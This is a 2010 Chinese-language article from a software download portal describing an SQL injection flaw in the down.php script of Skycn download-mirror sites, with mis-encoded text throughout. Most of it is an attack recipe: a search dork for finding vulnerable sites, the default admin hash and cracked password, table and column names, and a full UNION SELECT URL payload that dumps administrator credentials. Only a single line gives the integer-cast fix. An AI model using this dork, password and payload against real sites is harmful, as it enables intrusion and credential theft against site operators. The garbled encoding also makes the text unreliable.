西西軟件園多重安全檢測(cè)下載網(wǎng)站、值得信賴的軟件下載站!
軟件
軟件
文章
搜索

首頁西西教程數(shù)據(jù)庫教程 → 天空下載站(skycn)程序存在SQL注入漏洞及最新解決方案

天空下載站(skycn)程序存在SQL注入漏洞及最新解決方案

相關(guān)軟件相關(guān)文章發(fā)表評(píng)論 來源:本站整理時(shí)間:2010/8/6 13:35:29字體大。A-A+

作者:佚名點(diǎn)擊:77次評(píng)論:0次標(biāo)簽: SQL

  • 類型:電子教程大。8.5M語言:中文 評(píng)分:8.3
  • 標(biāo)簽:
立即下載

天空下載站是國內(nèi)著名的下載站點(diǎn),提供國內(nèi)外最新免費(fèi)軟件、共享軟件下載。其在全國各地鐵通、聯(lián)通、電信、信息港等都建有以php+MySql架設(shè)的下載分站,相當(dāng)一部分下載分站的建站程序采用同一套建站模板,而這套建站模板存在SQL注入漏洞。
關(guān)鍵詞:inurl:down.php

漏洞文件:down.php

down.php中沒有對(duì)get變量$id做任何過濾措施,導(dǎo)致攻擊者可以任意使用SQL注入語句進(jìn)行攻擊,通過測(cè)試發(fā)現(xiàn),多數(shù)管理員登陸口令默認(rèn)密碼并未修改,默認(rèn)管理員信息為1111_7363a304be1a682efaf10702fc7b97d8,解密密碼hash可知默認(rèn)密碼為sky!@#cn!

 

注入利用:

keyword:Copyright©1998 - 2007 Skycn.com All Rights Reserved inurl:down.php


http://site.com/down.php?id=1+union+select+column_numbers+from+table_name


column_numbers:不固定,通常為50+,也有少于40,例如臨沂信息港測(cè)試為38個(gè)顯示位


table_name:管理員表段名為master,字段名為username,password


在字段2軟件標(biāo)題顯示位填寫concat(username,0x5f,password)即可爆出管理員登陸口令

SQL EXP:

http://download.site.com/down.php?id=47488+and+1=2+union+select+1,concat(username,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+master

 

安全提示:

解決方法:$id=(int)$_GET['id'];

    相關(guān)文章

    相關(guān)評(píng)論

    閱讀本文后您有什么感想? 已有人給出評(píng)價(jià)!

    • 8 喜歡喜歡
    • 3 頂
    • 1 難過難過
    • 5 囧
    • 3 圍觀圍觀
    • 2 無聊無聊

    熱門評(píng)論

    最新評(píng)論

    發(fā)表評(píng)論 查看所有評(píng)論(0)

    昵稱:
    表情: 高興 可 汗 我不要 害羞 好 下下下 送花 屎 親親
    字?jǐn)?shù): 0/500 (您的評(píng)論需要經(jīng)過審核才能顯示)